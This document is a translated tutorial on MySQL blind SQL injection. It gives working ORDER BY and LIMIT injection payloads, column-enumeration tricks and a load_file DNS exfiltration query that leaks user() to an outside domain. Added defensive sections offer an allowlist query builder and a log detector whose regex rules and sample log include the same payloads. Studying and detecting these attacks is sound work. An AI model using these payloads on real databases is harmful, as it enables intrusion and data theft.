Some alternative blind injection techniques in MySQL Databases

Source: Internet
Author: User

The following article mainly introduces some practical techniques for alternative blind injection in MySQL databases. I saw some useful information on alternative blind injection in MySQL databases on a related website a few days ago; I think it is quite good, so I will share it with you.

Many of these techniques were learned from papers published abroad, but not many people in China use them.

I. order by parameter injection tips:

Both methods below share the same idea. Example of the vulnerable pattern:

"select username,password from uc_members order by ".$_GET['orderby']

A. Common usage:

1. [SQL] select username,password from uc_members order by 1,if((select 1)=2,1,(select value from uc_settings));

Returned error: [Err] 1242 - Subquery returns more than 1 row

2. [SQL] select username,password from uc_members order by 1,if((select 1)=1,1,(select value from uc_settings));

Returns normally.

B. Method seen in a paper from outside China:

1. [SQL] select username,password from uc_members order by 1,(select case when (2<1) then 1 else 1*(select username from uc_members) end)=1;

Returned error: [Err] 1242 - Subquery returns more than 1 row

2. [SQL] select username,password from uc_members order by 1,(select case when (2>1) then 1 else 1*(select username from uc_members) end)=1;

Returns normally.

II. limit parameter injection tips:

A. For a limit parameter that follows an order by, there is no good solution, because in a normal SQL statement an order by cannot be followed by a union. The following is an example:

into outfile '/www/root/xxx.php';

B. If there is no order by before the injected limit, it is much more convenient: you can append a union select statement directly and add whatever you like:

select * from cdb_members limit 1 union select 1,2,3,4,5,6,7,8,9,10,... (one constant for each column of cdb_members)

You can also use procedure analyse to obtain the field names:

select * from cdb_members where uid=1 limit 1,1 procedure analyse()

However, procedure analyse cannot be used after order by:

[SQL] select * from cdb_members order by uid desc limit 1 procedure analyse()

[Err] 1386 - Can't use ORDER clause with this procedure
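Sections I and II above exploit the same root cause: the ORDER BY and LIMIT positions cannot take a bind parameter, so applications paste the request parameter straight into the query text, as in "order by ".$_GET['orderby']. The following Python is an added example, not code from the article or from UCenter/Discuz; it shows that raw pattern beside an allowlist-based builder for the sort column, the sort direction and the LIMIT arguments. The sortable-column set, the page-size bound and the rows of the SQLite stand-in table are assumptions made for the demo.

```python
# Added example (not part of the original article): ORDER BY and LIMIT cannot
# be bound as parameters, so the only safe input is one that never reaches the
# SQL text as-is. Table and column names follow the article's uc_members;
# the allowlist, the page-size bound and the rows are constructed for the demo.
import re
import sqlite3

SORTABLE_COLUMNS = {"uid", "username", "regdate"}  # assumption: columns the UI may sort by
MAX_PAGE_SIZE = 100                                 # assumption: upper bound for LIMIT count


def vulnerable_order_clause(orderby_param: str) -> str:
    """The article's pattern: the request parameter is pasted straight after ORDER BY."""
    return "select username,password from uc_members order by " + orderby_param


def safe_order_clause(column: str, direction: str = "asc") -> str:
    """Only an allowlisted identifier and ASC/DESC ever reach the SQL text."""
    if column not in SORTABLE_COLUMNS:
        raise ValueError(f"unsortable column: {column!r}")
    direction = direction.lower()
    if direction not in ("asc", "desc"):
        raise ValueError(f"bad direction: {direction!r}")
    return f"order by `{column}` {direction}"


def safe_limit_clause(offset_param: str, count_param: str) -> str:
    """LIMIT arguments are integers only: strict digit check, then bounds."""
    if not (re.fullmatch(r"\d{1,9}", offset_param) and re.fullmatch(r"\d{1,9}", count_param)):
        raise ValueError("offset and count must be plain decimal integers")
    offset, count = int(offset_param), int(count_param)
    if not 1 <= count <= MAX_PAGE_SIZE:
        raise ValueError("page size out of range")
    return f"limit {offset},{count}"


def rejects(builder, *args) -> bool:
    """True when the builder refuses the input with ValueError."""
    try:
        builder(*args)
    except ValueError:
        return True
    return False


def build_demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the MySQL table, filled with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "create table uc_members (uid integer primary key, username text not null, "
        "password text not null, regdate integer not null)"
    )
    conn.executemany(
        "insert into uc_members values (?,?,?,?)",
        [(1, "alice", "h1", 100), (2, "bob", "h2", 200), (3, "carol", "h3", 300)],
    )
    return conn


def query_members(conn, column, direction, offset_param, count_param):
    """Run the hardened query and return the usernames in result order."""
    sql = (
        "select username,password from uc_members "
        + safe_order_clause(column, direction)
        + " "
        + safe_limit_clause(offset_param, count_param)
    )
    return [row[0] for row in conn.execute(sql)]


if __name__ == "__main__":
    payload = "1,if((select 1)=2,1,(select value from uc_settings))"  # section I payload
    print(vulnerable_order_clause(payload))        # payload lands verbatim in the query text
    print(rejects(safe_order_clause, payload))     # True
    print(query_members(build_demo_db(), "username", "desc", "0", "2"))  # ['carol', 'bob']
```

The builder never interpolates the raw parameter: the column name comes from the allowlist (the request only selects which entry), and LIMIT values must be plain digits, so a value such as "1 union select ..." is refused before any SQL is assembled. SQLite is used only so the example runs offline; the clause text is the same one a MySQL driver would receive.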

III. Tips when fields cannot be guessed:

When information_schema is unavailable (because of the MySQL version) or cannot be accessed, you cannot enumerate a table's field names in the usual way. In that case you can use %0 inside a subquery to obtain the column names. Take uc_members of UCenter as an example.

1. Guess the number of columns: SELECT 1 FROM `uc_members` WHERE (SELECT * FROM `uc_members`)=(1)

Returned error: #1241 - Operand should contain 12 column(s)

2. SELECT 1 FROM `uc_members` WHERE (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12 LIMIT 1)

Returns normally.

3. SELECT 1 FROM `uc_members` WHERE (1%0,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12 LIMIT 1)

Returned error: #1048 - Column 'uid' cannot be null

4. SELECT 1 FROM `uc_members` WHERE (1,2%0,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12 LIMIT 1)

Returned error: #1048 - Column 'username' cannot be null

5. ...... (the same for each remaining position)

Note: this does not apply to version 5.1 and later; the column must be declared NOT NULL and must not contain NULL values.

IV. Blind injection via DNS resolution on Windows:

If the blind injection is tedious, or the page returns the same result whether the condition is and 1=1 or and 1=2, injection through DNS is a good method. The premise is MySQL running with root privileges in a Windows environment, where the load_file function can read remote files. Build a local DNS server, point the NS record of a specific domain name at it, then inject and capture packets.

(Single quotes in the actual injection can be encoded locally.) select load_file(concat('\\\\aaa1.',(select user()),'.oldjun.com\\a.txt')). The select result is obtained from the packet capture:

29 28.524843 192.168.9.107 192.168.1.2 DNS Standard query A aaa1.root@localhost.oldjun.com
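As an added detection example (not part of the original article), the following Python scans constructed web-server access log lines for the probe shapes the sections above describe: the IF/CASE subquery in the ORDER BY position (section I), UNION SELECT, PROCEDURE ANALYSE() and INTO OUTFILE around LIMIT (section II), the row-tuple and k%0 comparisons (section III), and LOAD_FILE() (section IV). The log format, IP addresses, paths and the attacker.example hostname are made up for the demo.

```python
# Added example (not from the original article): detection of the probe
# shapes the article describes, run over constructed access log lines.
# Each rule maps to one section of the article; hosts, IPs and paths are made up.
import re
from urllib.parse import unquote_plus

# Rule name -> regex over the URL-decoded, whitespace-normalised query string.
RULES = {
    # Section I: IF(...) or CASE WHEN wrapping a subquery in the ORDER BY position.
    "conditional_subquery": r"(?:\bif\s*\(|\bcase\s+when\b).*?\(\s*select\b",
    # Section II.B: a UNION SELECT appended after LIMIT.
    "union_select": r"\bunion\s+(?:all\s+)?select\b",
    # Section II: PROCEDURE ANALYSE() appended to enumerate column names.
    "procedure_analyse": r"\bprocedure\s+analy[sz]e\s*\(",
    # Section II.A: INTO OUTFILE to write a file through the query.
    "into_outfile": r"\binto\s+outfile\b",
    # Section III: row-tuple comparison against SELECT *, or the k%0 null probe.
    "row_tuple_probe": r"\(\s*select\s+\*\s+from\b[^)]*\)\s*=\s*\(|\b\d+\s*%\s*0\s*[,)]",
    # Section IV: LOAD_FILE() used to trigger an outbound name lookup.
    "load_file": r"\bload_file\s*\(",
}
COMPILED = {name: re.compile(pat, re.IGNORECASE | re.DOTALL) for name, pat in RULES.items()}

# Combined log format; only the fields the scan needs are captured.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def normalise(query: str) -> str:
    """Decode %xx and + escapes, turn /* */ comments into spaces, collapse whitespace."""
    decoded = unquote_plus(query)
    decoded = re.sub(r"/\*.*?\*/", " ", decoded, flags=re.DOTALL)
    return re.sub(r"\s+", " ", decoded)


def classify(query: str) -> list:
    """Names of all rules the query string matches, in RULES order."""
    text = normalise(query)
    return [name for name, rx in COMPILED.items() if rx.search(text)]


def scan_log(lines):
    """Return (client_ip, path, [rules]) for every request that trips a rule."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # malformed line: skip rather than abort the scan
        path, _, query = m.group("target").partition("?")
        rules = classify(query)
        if rules:
            hits.append((m.group("ip"), path, rules))
    return hits


# Constructed sample: five probe requests and two benign ones.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2010:13:55:36 +0000] "GET /member.php?orderby=1%2Cif%28%28select+1%29%3D2%2C1%2C%28select+value+from+uc_settings%29%29 HTTP/1.1" 500 512 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [10/Oct/2010:13:55:40 +0000] "GET /member.php?orderby=username HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [10/Oct/2010:13:56:02 +0000] "GET /list.php?page=1%20union%20select%201,2,3,4 HTTP/1.1" 200 1900 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [10/Oct/2010:13:56:15 +0000] "GET /list.php?uid=1%20limit%201,1%20procedure%20analyse() HTTP/1.1" 500 480 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [10/Oct/2010:13:57:01 +0000] "GET /list.php?uid=1%20and%20(1%250,2,3)=(select%20*%20from%20uc_members%20limit%201) HTTP/1.1" 500 470 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [10/Oct/2010:13:58:30 +0000] "GET /list.php?id=1%20and%20load_file(concat(%27%5C%5C%5C%5Caaa1.%27,user(),%27.attacker.example%5C%5Ca.txt%27)) HTTP/1.1" 200 1900 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [10/Oct/2010:13:59:00 +0000] "GET /search.php?q=order+by+date HTTP/1.1" 200 3000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, rules in scan_log(SAMPLE_LOG):
        print(ip, path, ",".join(rules))
```

Only GET query strings are covered, because that is all the access log records; POST bodies and headers need a separate capture. The decoder handles %xx, + and /* */ comment whitespace, which is enough for the literal forms in this article, but not double encoding or other evasions the article does not discuss. A plain "order by" in a search term does not fire, so the benign last line stays quiet.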
